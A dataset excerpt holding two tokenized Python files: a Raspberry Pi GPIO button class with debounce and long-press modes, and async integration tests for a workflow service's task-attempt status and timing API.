content
stringlengths
0
1.55M
<import_stmt>time<import_from_stmt>signal pause<import_stmt>logging<import_stmt>RPi.GPIO<as>GPIO<line_sep>GPIO.setmode(GPIO.BCM)<line_sep>logger=logging.getLogger(__name__)<line_sep>map_edge_parse={'falling':GPIO.FALLING 'rising':GPIO.RISING 'both':GPIO.BOTH}<line_sep>map_pull_parse={'pull_up':GPIO.PUD_UP 'pull_down':GPIO.PUD_DOWN 'pull_off':GPIO.PUD_OFF}<line_sep>map_edge_print={GPIO.FALLING:'falling' GPIO.RISING:'rising' GPIO.BOTH:'both'}<line_sep>map_pull_print={GPIO.PUD_UP:'pull_up' GPIO.PUD_DOWN:'pull_down' GPIO.PUD_OFF:'pull_off'}<def_stmt>parse_edge_key edge<block_start><if_stmt>edge<in>[GPIO.FALLING GPIO.RISING GPIO.BOTH]<block_start><return>edge<block_end><try_stmt><block_start>result=map_edge_parse[edge.lower()]<block_end><except_stmt>KeyError<block_start>result=edge<line_sep><raise>KeyError('Unknown Edge type {edge}'.format(edge=edge))<block_end><return>result<block_end><def_stmt>parse_pull_up_down pull_up_down<block_start><if_stmt>pull_up_down<in>[GPIO.PUD_UP GPIO.PUD_DOWN GPIO.PUD_OFF]<block_start><return>pull_up_down<block_end><try_stmt><block_start>result=map_pull_parse[pull_up_down]<block_end><except_stmt>KeyError<block_start>result=pull_up_down<line_sep><raise>KeyError('Unknown Pull Up/Down type {pull_up_down}'.format(pull_up_down=pull_up_down))<block_end><return>result<block_end><def_stmt>print_edge_key edge<block_start><try_stmt><block_start>result=map_edge_print[edge]<block_end><except_stmt>KeyError<block_start>result=edge<block_end><return>result<block_end><def_stmt>print_pull_up_down pull_up_down<block_start><try_stmt><block_start>result=map_pull_print[pull_up_down]<block_end><except_stmt>KeyError<block_start>result=pull_up_down<block_end><return>result<block_end># This function takes a holding time (fractional seconds), a channel, a GPIO state and an action reference (function). # It checks if the GPIO is in the state since the function was called. If the state # changes it return False. If the time is over the function returns True. <def_stmt>checkGpioStaysInState holdingTime gpioChannel gpioHoldingState# Get a reference start time (https://docs.python.org/3/library/time.html#time.perf_counter) <block_start>startTime=time.perf_counter()<line_sep># Continously check if time is not over <while_stmt><true><block_start>time.sleep(0.1)<line_sep>currentState=GPIO.input(gpioChannel)<if_stmt>holdingTime<l>(time.perf_counter()-startTime)<block_start><break><block_end># Return if state does not match holding state <if_stmt>(gpioHoldingState<ne>currentState)<block_start><return><false><block_end># Else: Wait <block_end><if_stmt>(gpioHoldingState<ne>currentState)<block_start><return><false><block_end><return><true><block_end><class_stmt>SimpleButton<block_start><def_stmt>__init__ self pin action=<lambda>*args:<none> action2=<lambda>*args:<none> name=<none> bouncetime=500 antibouncehack=<false> edge='falling' hold_time=.3 hold_mode=<none> pull_up_down='pull_up'<block_start>self.edge=parse_edge_key(edge)<line_sep>self.hold_time=hold_time<line_sep>self.hold_mode=hold_mode<line_sep>self.pull_up=<true><line_sep>self.pull_up_down=parse_pull_up_down(pull_up_down)<line_sep>self.pin=pin<line_sep>self.name=name<line_sep>self.bouncetime=bouncetime<line_sep>self.antibouncehack=antibouncehack<line_sep>GPIO.setup(self.pin GPIO.IN pull_up_down=self.pull_up_down)<line_sep>self._action=action<line_sep>self._action2=action2<line_sep>GPIO.add_event_detect(self.pin edge=self.edge callback=self.callbackFunctionHandler bouncetime=self.bouncetime)<line_sep>self.callback_with_pin_argument=<false><block_end><def_stmt>callbackFunctionHandler self *args<block_start><if_stmt>len(args)<g>0<and>args[0]<eq>self.pin<and><not>self.callback_with_pin_argument<block_start>logger.debug('Remove pin argument by callbackFunctionHandler - args before: {}'.format(args))<line_sep>args=args[1:]<line_sep>logger.debug('args after: {}'.format(args))<block_end><if_stmt>self.antibouncehack<block_start>time.sleep(0.1)<line_sep>inval=GPIO.input(self.pin)<if_stmt>inval<ne>GPIO.LOW<block_start><return><none><block_end><block_end><if_stmt>self.hold_mode<in>('Repeat' 'Postpone' 'SecondFunc' 'SecondFuncRepeat')<block_start><return>self.longPressHandler(*args)<block_end><else_stmt><block_start>logger.info('{}: execute callback'.format(self.name))<line_sep><return>self.when_pressed(*args)<block_end><block_end>@property<def_stmt>when_pressed self<block_start>logger.info('{}: action'.format(self.name))<line_sep><return>self._action<block_end>@property<def_stmt>when_held self<block_start>logger.info('{}: action2'.format(self.name))<line_sep><return>self._action2<block_end>@when_pressed.setter<def_stmt>when_pressed self func<block_start>logger.info('{}: set when_pressed')<line_sep>self._action=func<line_sep>GPIO.remove_event_detect(self.pin)<line_sep>logger.info('add new action')<line_sep>GPIO.add_event_detect(self.pin edge=self.edge callback=self.callbackFunctionHandler bouncetime=self.bouncetime)<block_end><def_stmt>set_callbackFunction self callbackFunction<block_start>self.when_pressed=callbackFunction<block_end><def_stmt>longPressHandler self *args<block_start>logger.info('{}: longPressHandler, mode: {}'.format(self.name self.hold_mode))<line_sep># instant action (except Postpone mode) <if_stmt>self.hold_mode<ne>"Postpone"<block_start>self.when_pressed(*args)<block_end># action(s) after hold_time <if_stmt>self.hold_mode<eq>"Repeat"# Repeated call of main action (multiple times if button is held long enough) <block_start><while_stmt>checkGpioStaysInState(self.hold_time self.pin GPIO.LOW)<block_start>self.when_pressed(*args)<block_end><block_end><elif_stmt>self.hold_mode<eq>"Postpone"# Postponed call of main action (once) <block_start><if_stmt>checkGpioStaysInState(self.hold_time self.pin GPIO.LOW)<block_start>self.when_pressed(*args)<block_end><while_stmt>checkGpioStaysInState(self.hold_time self.pin GPIO.LOW)<block_start><pass><block_end><block_end><elif_stmt>self.hold_mode<eq>"SecondFunc"# Call of secondary action (once) <block_start><if_stmt>checkGpioStaysInState(self.hold_time self.pin GPIO.LOW)<block_start>self.when_held(*args)<block_end><while_stmt>checkGpioStaysInState(self.hold_time self.pin GPIO.LOW)<block_start><pass><block_end><block_end><elif_stmt>self.hold_mode<eq>"SecondFuncRepeat"# Repeated call of secondary action (multiple times if button is held long enough) <block_start><while_stmt>checkGpioStaysInState(self.hold_time self.pin GPIO.LOW)<block_start>self.when_held(*args)<block_end><block_end><block_end><def_stmt>__del__ self<block_start>logger.debug('remove event detection')<line_sep>GPIO.remove_event_detect(self.pin)<block_end>@property<def_stmt>is_pressed self<block_start><if_stmt>self.pull_up<block_start><return><not>GPIO.input(self.pin)<block_end><return>GPIO.input(self.pin)<block_end><def_stmt>__repr__ self<block_start><return>'<SimpleButton-{}(pin={},edge={},hold_mode={},hold_time={},bouncetime={},antibouncehack={},pull_up_down={})>'.format(self.name self.pin print_edge_key(self.edge) self.hold_mode self.hold_time self.bouncetime self.antibouncehack print_pull_up_down(self.pull_up_down))<block_end><block_end><if_stmt>__name__<eq>"__main__"<block_start>print('please enter pin no to test')<line_sep>pin=int(input())<line_sep>func=<lambda>*args:print('FunctionCall with {}'.format(args))<line_sep>btn=SimpleButton(pin=pin action=func hold_mode='Repeat')<line_sep>pause()<block_end>
<import_stmt>pytest<import_stmt>time<import_from_stmt>.utils init_app init_db clean_db add_flow add_run add_step add_task add_artifact _test_list_resources _test_single_resource add_metadata get_heartbeat_ts <line_sep>pytestmark=[pytest.mark.integration_tests]<line_sep># Fixtures begin @pytest.fixture<def_stmt>cli loop aiohttp_client<block_start><return>init_app(loop aiohttp_client)<block_end>@pytest.fixture<async_keyword><def_stmt>db cli<block_start>async_db=<await>init_db(cli)<line_sep><yield>async_db<line_sep><await>clean_db(async_db)<block_end># Fixtures end <async_keyword><def_stmt>test_list_tasks cli db<block_start>_flow=(<await>add_flow(db flow_id="HelloFlow")).body<line_sep>_run=(<await>add_run(db flow_id=_flow.get("flow_id"))).body<line_sep>_step=(<await>add_step(db flow_id=_run.get("flow_id") step_name="step" run_number=_run.get("run_number") run_id=_run.get("run_id"))).body<line_sep><await>_test_list_resources(cli db "/flows/{flow_id}/runs/{run_number}/tasks".format(**_step) 200 [])<line_sep><await>_test_list_resources(cli db "/flows/{flow_id}/runs/{run_number}/steps/{step_name}/tasks".format(**_step) 200 [])<line_sep>_task=<await>create_task(db step=_step)<line_sep>_task['duration']=<none><line_sep>_task['status']='pending'<line_sep><await>_test_list_resources(cli db "/flows/{flow_id}/runs/{run_number}/tasks".format(**_task) 200 [_task])<line_sep><await>_test_list_resources(cli db "/flows/{flow_id}/runs/{run_number}/steps/{step_name}/tasks".format(**_task) 200 [_task])<block_end><async_keyword><def_stmt>test_list_tasks_non_numerical cli db<block_start>_flow=(<await>add_flow(db flow_id="HelloFlow")).body<line_sep>_run=(<await>add_run(db flow_id=_flow.get("flow_id"))).body<line_sep>_step=(<await>add_step(db flow_id=_run.get("flow_id") step_name="step" run_number=_run.get("run_number") run_id=_run.get("run_id"))).body<line_sep><await>_test_list_resources(cli db "/flows/{flow_id}/runs/{run_number}/tasks".format(**_step) 200 [])<line_sep><await>_test_list_resources(cli db "/flows/{flow_id}/runs/{run_number}/steps/{step_name}/tasks".format(**_step) 200 [])<line_sep>_task=<await>create_task(db step=_step task_name="bar")<line_sep>_,data=<await>_test_list_resources(cli db "/flows/{flow_id}/runs/{run_number}/tasks".format(**_task) 200 <none>)<line_sep>_,data=<await>_test_list_resources(cli db "/flows/{flow_id}/runs/{run_number}/steps/{step_name}/tasks".format(**_task) 200 <none>)<assert_stmt>len(data)<eq>1<assert_stmt>data[0]['task_name']<eq>'bar'<assert_stmt>data[0]['task_id']<ne>'bar'<block_end><async_keyword><def_stmt>test_single_task cli db<block_start><await>_test_single_resource(cli db "/flows/HelloFlow/runs/404/steps/none/tasks/5" 404 {})<line_sep>_task=<await>create_task(db)<line_sep>_task['duration']=<none><line_sep>_task['status']='pending'<line_sep><await>_test_single_resource(cli db "/flows/{flow_id}/runs/{run_number}/steps/{step_name}/tasks/{task_id}".format(**_task) 200 _task)<block_end><async_keyword><def_stmt>test_single_task_non_numerical cli db<block_start>_task=<await>create_task(db task_name="bar")<line_sep>_,data=<await>_test_single_resource(cli db "/flows/{flow_id}/runs/{run_number}/steps/{step_name}/tasks/bar".format(**_task) 200 <none>)<assert_stmt>data['task_name']<eq>'bar'<assert_stmt>data['task_id']<ne>'bar'<block_end><async_keyword><def_stmt>test_list_old_metadata_task_attempts cli db# Test tasks with old (missing attempt) metadata <block_start>_task=<await>create_task(db)<line_sep>_task['duration']=<none><line_sep>_task['status']='pending'<line_sep><await>_test_list_resources(cli db "/flows/{flow_id}/runs/{run_number}/steps/{step_name}/tasks/{task_id}/attempts".format(**_task) 200 [_task])<line_sep>_artifact_first=<await>create_ok_artifact_for_task(db _task)<line_sep>_artifact_second=<await>create_ok_artifact_for_task(db _task attempt=1)<line_sep>_task['status']='unknown'<line_sep>_task['task_ok']='location'<line_sep>_task_first_attempt=dict(_task)<line_sep>_task_second_attempt=dict(_task)<line_sep>_task_first_attempt['attempt_id']=0<line_sep>_task_first_attempt['finished_at']=_artifact_first['ts_epoch']<line_sep>_task_first_attempt['duration']=_artifact_first['ts_epoch']-_task_first_attempt['ts_epoch']<line_sep>_task_second_attempt['attempt_id']=1<line_sep>_task_second_attempt['finished_at']=_artifact_second['ts_epoch']<line_sep>_task_second_attempt['duration']=_artifact_second['ts_epoch']-_task_second_attempt['ts_epoch']<line_sep><await>_test_list_resources(cli db "/flows/{flow_id}/runs/{run_number}/steps/{step_name}/tasks?task_id={task_id}".format(**_task) 200 [_task_second_attempt _task_first_attempt])<line_sep><await>_test_list_resources(cli db "/flows/{flow_id}/runs/{run_number}/steps/{step_name}/tasks/{task_id}/attempts".format(**_task) 200 [_task_second_attempt _task_first_attempt])<block_end><async_keyword><def_stmt>test_old_metadata_task_with_multiple_attempts cli db# Test tasks with old (missing attempt) metadata <block_start>_task=<await>create_task(db)<line_sep>_task['duration']=<none><line_sep>_task['status']='pending'<line_sep><await>_test_list_resources(cli db "/flows/{flow_id}/runs/{run_number}/steps/{step_name}/tasks/{task_id}/attempts".format(**_task) 200 [_task])<line_sep>_artifact_first=<await>create_ok_artifact_for_task(db _task)<line_sep>_artifact_second=<await>create_ok_artifact_for_task(db _task attempt=1)<line_sep>_task['status']='unknown'<line_sep>_task['task_ok']='location'<line_sep>_task['attempt_id']=1<line_sep>_task['finished_at']=_artifact_second['ts_epoch']<line_sep>_task['duration']=_artifact_second['ts_epoch']-_task['ts_epoch']<line_sep><await>_test_single_resource(cli db "/flows/{flow_id}/runs/{run_number}/steps/{step_name}/tasks/{task_id}".format(**_task) 200 _task)<block_end><async_keyword><def_stmt>test_task_with_attempt_metadata cli db<block_start>_task=<await>create_task(db)<line_sep>_task['duration']=<none><line_sep>_task['status']='pending'<line_sep><await>_test_list_resources(cli db "/flows/{flow_id}/runs/{run_number}/steps/{step_name}/tasks/{task_id}/attempts".format(**_task) 200 [_task])<line_sep>_attempt_first=<await>create_task_attempt_metadata(db _task)<line_sep>_artifact_first=<await>create_ok_artifact_for_task(db _task)<line_sep>_task['started_at']=_attempt_first['ts_epoch']<line_sep>_task['finished_at']=_artifact_first['ts_epoch']<line_sep>_task['duration']=_task['finished_at']-_task['started_at']<line_sep>_task['status']='unknown'<line_sep>_task['task_ok']='location'<line_sep><await>_test_single_resource(cli db "/flows/{flow_id}/runs/{run_number}/steps/{step_name}/tasks/{task_id}".format(**_task) 200 _task)<line_sep>_attempt_done_first=<await>create_task_attempt_done_metadata(db _task)<line_sep>_task['status']='unknown'<line_sep>_task['finished_at']=_attempt_done_first['ts_epoch']<line_sep>_task['duration']=_attempt_done_first['ts_epoch']-_task['started_at']<line_sep><await>_test_single_resource(cli db "/flows/{flow_id}/runs/{run_number}/steps/{step_name}/tasks/{task_id}".format(**_task) 200 _task)<line_sep>_attempt_ok_first=<await>create_task_attempt_ok_metadata(db _task 0 <true>)# status 'completed' _task['status']='completed'<line_sep>_task['finished_at']=_attempt_ok_first['ts_epoch']<line_sep>_task['duration']=_attempt_ok_first['ts_epoch']-_task['started_at']<line_sep>_task['task_ok']=<none># intended behavior, status refinement location field should remain empty when metadata exists. <await>_test_single_resource(cli db "/flows/{flow_id}/runs/{run_number}/steps/{step_name}/tasks/{task_id}".format(**_task) 200 _task)<block_end><async_keyword><def_stmt>test_task_failed_status_with_heartbeat cli db<block_start>_task=<await>create_task(db last_heartbeat_ts=1 status="failed")<line_sep>_task['finished_at']=1000# should be last heartbeat in this case, due to every other timestamp missing. _task['duration']=_task['last_heartbeat_ts']<times>1000-_task['ts_epoch']<line_sep><await>_test_list_resources(cli db "/flows/{flow_id}/runs/{run_number}/steps/{step_name}/tasks/{task_id}/attempts".format(**_task) 200 [_task])<block_end><async_keyword><def_stmt>test_task_running_status_with_heartbeat cli db<block_start>hb_freeze=get_heartbeat_ts()<line_sep>_task=<await>create_task(db last_heartbeat_ts=hb_freeze)<line_sep>_task['finished_at']=<none># should not have a finished at for running tasks. _task['duration']=hb_freeze<times>1000-_task['ts_epoch']<line_sep><await>_test_list_resources(cli db "/flows/{flow_id}/runs/{run_number}/steps/{step_name}/tasks/{task_id}/attempts".format(**_task) 200 [_task])<block_end><async_keyword><def_stmt>test_list_task_attempts cli db<block_start>_task=<await>create_task(db)<line_sep>_task['duration']=<none><line_sep>_task['status']='pending'<line_sep><await>_test_list_resources(cli db "/flows/{flow_id}/runs/{run_number}/steps/{step_name}/tasks/{task_id}/attempts".format(**_task) 200 [_task])<line_sep>_attempt_first=<await>create_task_attempt_metadata(db _task)<line_sep>_artifact_first=<await>create_ok_artifact_for_task(db _task)<line_sep>_attempt_done_first=<await>create_task_attempt_done_metadata(db _task)<line_sep>_attempt_second=<await>create_task_attempt_metadata(db _task attempt=1)<line_sep>_artifact_second=<await>create_ok_artifact_for_task(db _task attempt=1)<line_sep>_task_first_attempt=dict(_task)<line_sep>_task_second_attempt=dict(_task)<line_sep>_task_first_attempt['attempt_id']=0<line_sep>_task_first_attempt['status']='unknown'<line_sep>_task_first_attempt['task_ok']='location'<line_sep>_task_first_attempt['started_at']=_attempt_first['ts_epoch']<line_sep>_task_first_attempt['finished_at']=_attempt_done_first['ts_epoch']<line_sep>_task_first_attempt['duration']=_task_first_attempt['finished_at']-_task_first_attempt['started_at']<line_sep># Second attempt counts as completed as well due to the _task_ok existing. _task_second_attempt['attempt_id']=1<line_sep>_task_second_attempt['status']='unknown'<line_sep>_task_second_attempt['task_ok']='location'<line_sep>_task_second_attempt['started_at']=_attempt_second['ts_epoch']<line_sep>_task_second_attempt['finished_at']=_artifact_second['ts_epoch']<line_sep>_task_second_attempt['duration']=_task_second_attempt['finished_at']-_task_second_attempt['started_at']<line_sep><await>_test_list_resources(cli db "/flows/{flow_id}/runs/{run_number}/steps/{step_name}/tasks?task_id={task_id}".format(**_task) 200 [_task_second_attempt _task_first_attempt])<line_sep><await>_test_list_resources(cli db "/flows/{flow_id}/runs/{run_number}/steps/{step_name}/tasks/{task_id}/attempts".format(**_task) 200 [_task_second_attempt _task_first_attempt])<block_end><async_keyword><def_stmt>test_task_with_attempt_ok_completed cli db<block_start>_task=<await>create_task(db)<line_sep>_attempt_first=<await>create_task_attempt_metadata(db _task)<line_sep>_artifact_first=<await>create_ok_artifact_for_task(db _task)<line_sep>_attempt_ok=<await>create_task_attempt_ok_metadata(db _task 0 <true>)# status = 'completed' _task['started_at']=_attempt_first['ts_epoch']<line_sep>_task['finished_at']=_attempt_ok['ts_epoch']<line_sep>_task['duration']=_attempt_ok['ts_epoch']-_task['started_at']<line_sep>_task['status']='completed'<line_sep><await>_test_single_resource(cli db "/flows/{flow_id}/runs/{run_number}/steps/{step_name}/tasks/{task_id}".format(**_task) 200 _task)<block_end><async_keyword><def_stmt>test_task_with_attempt_ok_failed cli db<block_start>_task=<await>create_task(db)<line_sep>_attempt_first=<await>create_task_attempt_metadata(db _task)<line_sep>_artifact_first=<await>create_ok_artifact_for_task(db _task)<line_sep>_task['started_at']=_attempt_first['ts_epoch']<line_sep>_task['finished_at']=_artifact_first['ts_epoch']<line_sep>_task['duration']=_task['finished_at']-_task['started_at']<line_sep>_task['status']='failed'<line_sep>_attempt_ok=<await>create_task_attempt_ok_metadata(db _task 0 <false>)# status = 'failed' _task['finished_at']=_attempt_ok['ts_epoch']<line_sep>_task['duration']=_attempt_ok['ts_epoch']-_task['started_at']<line_sep><await>_test_single_resource(cli db "/flows/{flow_id}/runs/{run_number}/steps/{step_name}/tasks/{task_id}".format(**_task) 200 _task)<block_end><async_keyword><def_stmt>test_list_task_multiple_attempts_failure cli db<block_start>_task=<await>create_task(db)<line_sep>_attempt_first=<await>create_task_attempt_metadata(db _task)<line_sep>_artifact_first=<await>create_ok_artifact_for_task(db _task)<line_sep>_attempt_done_first=<await>create_task_attempt_done_metadata(db _task)<line_sep>_attempt_second=<await>create_task_attempt_metadata(db _task attempt=1)<line_sep>_artifact_second=<await>create_ok_artifact_for_task(db _task attempt=1)<line_sep># Mark first attempt as 'failure' and second as 'completed' _attempt_ok_first=<await>create_task_attempt_ok_metadata(db _task 0 <false>)# status = 'failed' _attempt_ok_second=<await>create_task_attempt_ok_metadata(db _task 1 <true>)# status = 'completed' _task_first_attempt=dict(_task)<line_sep>_task_second_attempt=dict(_task)<line_sep>_task_first_attempt['attempt_id']=0<line_sep>_task_first_attempt['status']='failed'<line_sep>_task_first_attempt['started_at']=_attempt_first['ts_epoch']<line_sep>_task_first_attempt['finished_at']=_attempt_done_first['ts_epoch']<line_sep>_task_first_attempt['duration']=_task_first_attempt['finished_at']-_task_first_attempt['started_at']<line_sep>_task_first_attempt['finished_at']=_attempt_ok_first['ts_epoch']<line_sep>_task_first_attempt['duration']=_attempt_ok_first['ts_epoch']-_task_first_attempt['started_at']<line_sep># Second attempt counts as completed as well due to the _task_ok existing. _task_second_attempt['attempt_id']=1<line_sep>_task_second_attempt['status']='completed'<line_sep>_task_second_attempt['started_at']=_attempt_second['ts_epoch']<line_sep>_task_second_attempt['finished_at']=_artifact_second['ts_epoch']<line_sep>_task_second_attempt['duration']=_task_second_attempt['finished_at']-_task_second_attempt['started_at']<line_sep>_task_second_attempt['finished_at']=_attempt_ok_second['ts_epoch']<line_sep>_task_second_attempt['duration']=_attempt_ok_second['ts_epoch']-_task_second_attempt['started_at']<line_sep><await>_test_list_resources(cli db "/flows/{flow_id}/runs/{run_number}/steps/{step_name}/tasks?task_id={task_id}".format(**_task) 200 [_task_second_attempt _task_first_attempt])<line_sep><await>_test_list_resources(cli db "/flows/{flow_id}/runs/{run_number}/steps/{step_name}/tasks/{task_id}/attempts".format(**_task) 200 [_task_second_attempt _task_first_attempt])<block_end><async_keyword><def_stmt>test_task_attempts_with_attempt_metadata cli db<block_start>_task=<await>create_task(db)<line_sep>_task['duration']=<none><line_sep>_task['status']='pending'<line_sep><await>_test_list_resources(cli db "/flows/{flow_id}/runs/{run_number}/steps/{step_name}/tasks/{task_id}/attempts".format(**_task) 200 [_task])<line_sep>_attempt_first=<await>create_task_attempt_metadata(db _task)<line_sep>_artifact_first=<await>create_ok_artifact_for_task(db _task)<line_sep>_attempt_done_first=<await>create_task_attempt_done_metadata(db _task)<line_sep># attempt metadata is written but no artifacts exist yet. # Queries should return a second attempt at this point already! _attempt_second=<await>create_task_attempt_metadata(db _task attempt=1)<line_sep>_task_first_attempt=dict(_task)<line_sep>_task_second_attempt=dict(_task)<line_sep>_task_first_attempt['attempt_id']=0<line_sep>_task_first_attempt['task_ok']='location'# should have location for status artifact _task_first_attempt['status']='unknown'# 'unknown' because we cannot determine correct status from DB as attempt_ok is missing _task_first_attempt['started_at']=_attempt_first['ts_epoch']<line_sep>_task_first_attempt['finished_at']=_attempt_done_first['ts_epoch']<line_sep>_task_first_attempt['duration']=_task_first_attempt['finished_at']-_task_first_attempt['started_at']<line_sep>_task_second_attempt['attempt_id']=1<line_sep>_task_second_attempt['status']='running'<line_sep>_task_second_attempt['started_at']=_attempt_second['ts_epoch']<line_sep>_task_second_attempt['duration']=int(round(time.time()<times>1000))-_task_second_attempt['started_at']<line_sep><await>_test_list_resources(cli db "/flows/{flow_id}/runs/{run_number}/steps/{step_name}/tasks?task_id={task_id}".format(**_task) 200 [_task_second_attempt _task_first_attempt] approx_keys=["duration"])<line_sep><await>_test_list_resources(cli db "/flows/{flow_id}/runs/{run_number}/steps/{step_name}/tasks/{task_id}/attempts".format(**_task) 200 [_task_second_attempt _task_first_attempt] approx_keys=["duration"])<line_sep># Write attempt_ok data for first attempt to check for status changes. _first_attempt_ok=<await>create_task_attempt_ok_metadata(db _task 0 <false>)<line_sep># NOTE: in current implementation, attempt_ok overrides attempt-done as a more accurate timestamp for finished_at. _task_first_attempt['finished_at']=_first_attempt_ok['ts_epoch']<line_sep>_task_first_attempt['duration']=_task_first_attempt['finished_at']-_task_first_attempt['started_at']<line_sep>_task_first_attempt['task_ok']=<none># should have no task_ok location, as status can be determined from db. _task_first_attempt['status']='failed'# 'failed' because now we have attempt_ok false in db. <await>_test_list_resources(cli db "/flows/{flow_id}/runs/{run_number}/steps/{step_name}/tasks?task_id={task_id}".format(**_task) 200 [_task_second_attempt _task_first_attempt] approx_keys=["duration"])<line_sep><await>_test_list_resources(cli db "/flows/{flow_id}/runs/{run_number}/steps/{step_name}/tasks/{task_id}/attempts".format(**_task) 200 [_task_second_attempt _task_first_attempt] approx_keys=["duration"])<block_end><async_keyword><def_stmt>test_task_attempt_statuses_with_attempt_ok_failed cli db<block_start>_task=<await>create_task(db)<line_sep>_task['duration']=<none><line_sep>_task['status']='pending'<line_sep><await>_test_list_resources(cli db "/flows/{flow_id}/runs/{run_number}/steps/{step_name}/tasks/{task_id}/attempts".format(**_task) 200 [_task])<line_sep>_attempt_first=<await>create_task_attempt_metadata(db _task)<line_sep>_artifact_first=<await>create_ok_artifact_for_task(db _task)<line_sep>_attempt_done_first=<await>create_task_attempt_done_metadata(db _task)<line_sep>_attempt_ok_first=<await>create_task_attempt_ok_metadata(db _task 0 <false>)# status = 'failed' _attempt_second=<await>create_task_attempt_metadata(db _task attempt=1)<line_sep>_attempt_done_second=<await>create_task_attempt_done_metadata(db _task attempt=1)<line_sep>_attempt_ok_second=<await>create_task_attempt_ok_metadata(db _task 1 <true>)# status = 'completed' _task_first_attempt=dict(_task)<line_sep>_task_second_attempt=dict(_task)<line_sep># NOTE: In the current implementation attempt_ok overrides attempt-done ts_epoch as the finished_at # as a more accurate timestamp for when a task finished. _task_first_attempt['attempt_id']=0<line_sep>_task_first_attempt['status']='failed'<line_sep>_task_first_attempt['started_at']=_attempt_first['ts_epoch']<line_sep>_task_first_attempt['finished_at']=_attempt_ok_first['ts_epoch']<line_sep>_task_first_attempt['duration']=_task_first_attempt['finished_at']-_task_first_attempt['started_at']<line_sep>_task_second_attempt['attempt_id']=1<line_sep>_task_second_attempt['status']='completed'<line_sep>_task_second_attempt['started_at']=_attempt_second['ts_epoch']<line_sep>_task_second_attempt['finished_at']=_attempt_ok_second['ts_epoch']<line_sep>_task_second_attempt['duration']=_task_second_attempt['finished_at']-_task_second_attempt['started_at']<line_sep><await>_test_list_resources(cli db "/flows/{flow_id}/runs/{run_number}/steps/{step_name}/tasks?task_id={task_id}".format(**_task) 200 [_task_second_attempt _task_first_attempt])<line_sep><await>_test_list_resources(cli db "/flows/{flow_id}/runs/{run_number}/steps/{step_name}/tasks/{task_id}/attempts".format(**_task) 200 [_task_second_attempt _task_first_attempt])<block_end># Test cases from the google docs table. # status 'completed' tests # # STATUS: attempt_ok in task metadata for the attempt is set to True # STARTED_AT: created_at property for attempt attribute for the attempt in task metadata # FINISHED_AT: created_at property for attempt_ok attribute for the attempt in task metadata # NOTE: for a more accurate finished_at timestamp, use the greatest timestamp out of task_ok / attempt_ok / attempt-done # as this is the latest write_timestamp for the task <async_keyword><def_stmt>test_task_attempt_status_completed cli db<block_start>_task=<await>create_task(db)<line_sep>_task['duration']=<none><line_sep>_task['status']='pending'<line_sep><await>_test_list_resources(cli db "/flows/{flow_id}/runs/{run_number}/steps/{step_name}/tasks/{task_id}/attempts".format(**_task) 200 [_task])<line_sep>_attempt=<await>create_task_attempt_metadata(db _task 0)<line_sep>_attempt_ok=<await>create_task_attempt_ok_metadata(db _task 0 <true>)<line_sep>_attempt_done=<await>create_task_attempt_done_metadata(db _task 0)<line_sep>_task['status']='completed'<line_sep>_task['started_at']=_attempt['ts_epoch']<line_sep>_task['finished_at']=_attempt_done['ts_epoch']<line_sep>_task['duration']=_task['finished_at']-_task['started_at']<line_sep><await>_test_list_resources(cli db "/flows/{flow_id}/runs/{run_number}/steps/{step_name}/tasks/{task_id}/attempts".format(**_task) 200 [_task])<block_end># status 'running' tests # # STATUS 'running': # Has all of # Has a start time (NOTE: this requires 'attempt' metadata to be present) # attempt_ok does not exist in the task metadata # Has logged a heartbeat in the last x minutes (NOTE: we actually rely on heartbeat for running status.) # No subsequent attempt exists # STARTED_AT: created_at property for attempt attribute for the attempt in task metadata # FINISHED_AT: does not apply (NULL) <async_keyword><def_stmt>test_task_attempt_status_running cli db<block_start>_task=<await>create_task(db last_heartbeat_ts=get_heartbeat_ts())# default status: 'running' _task['duration']=_task['last_heartbeat_ts']<times>1000-_task['ts_epoch']<line_sep><await>_test_list_resources(cli db "/flows/{flow_id}/runs/{run_number}/steps/{step_name}/tasks/{task_id}/attempts".format(**_task) 200 [_task])<line_sep>_attempt=<await>create_task_attempt_metadata(db _task 0)<line_sep>_task['started_at']=_attempt['ts_epoch']<line_sep>_task['finished_at']=<none><line_sep>_task['duration']=_task['last_heartbeat_ts']<times>1000-_task['started_at']<line_sep><await>_test_list_resources(cli db "/flows/{flow_id}/runs/{run_number}/steps/{step_name}/tasks/{task_id}/attempts".format(**_task) 200 [_task])<block_end># status 'failed' tests # # STATUS: # Either of # attempt_ok in task metadata for the attempt is set to False # No heartbeat has been logged for the task in the last x minutes and no new attempt has started # A newer attempt exists # STARTED_AT: created_at property for attempt attribute for the attempt in task metadata # FINISHED_AT: # Either of (in priority) # created_at property for attempt_ok attribute for the attempt in task metadata # The timestamp in the heartbeat column for the task if no subsequent attempt is detected # If a subsequent attempt exists, use the start time of the subsequent attempt <async_keyword><def_stmt>test_task_attempt_status_failed_with_existing_subsequent_attempt cli db<block_start>_task=<await>create_task(db last_heartbeat_ts=get_heartbeat_ts())<line_sep>_task['duration']=_task['last_heartbeat_ts']<times>1000-_task['ts_epoch']<line_sep><await>_test_list_resources(cli db "/flows/{flow_id}/runs/{run_number}/steps/{step_name}/tasks/{task_id}/attempts".format(**_task) 200 [_task])<line_sep>_first_attempt=dict(_task)<line_sep>_second_attempt=dict(_task)<line_sep># we explicitly leave out attempt completion metadata for attempt 0 to test that it fails correctly # when attempt 1 exists. # ATTEMPT-0 _first_attempt_meta=<await>create_task_attempt_metadata(db _task 0)<line_sep>_first_attempt['started_at']=_first_attempt_meta['ts_epoch']<line_sep>_first_attempt['duration']=_first_attempt['last_heartbeat_ts']<times>1000-_first_attempt['started_at']<line_sep><await>_test_list_resources(cli db "/flows/{flow_id}/runs/{run_number}/steps/{step_name}/tasks/{task_id}/attempts".format(**_task) 200 [_first_attempt])<line_sep># ATTEMPT-1 _second_attempt_meta=<await>create_task_attempt_metadata(db _task 1)<line_sep>_second_attempt['attempt_id']=1<line_sep>_second_attempt['started_at']=_second_attempt_meta['ts_epoch']<line_sep>_second_attempt['duration']=_second_attempt['last_heartbeat_ts']<times>1000-_second_attempt['started_at']<line_sep># first attempt should be failed due to second attempt existing. # finished_at timestamp should be the started_at of the second attempt due to it existing. _first_attempt['status']='failed'<line_sep>_first_attempt['finished_at']=_second_attempt['started_at']<line_sep>_first_attempt['duration']=_first_attempt['finished_at']-_first_attempt['started_at']<line_sep><await>_test_list_resources(cli db "/flows/{flow_id}/runs/{run_number}/steps/{step_name}/tasks/{task_id}/attempts".format(**_task) 200 [_second_attempt _first_attempt])<block_end># Resource Helpers / factories 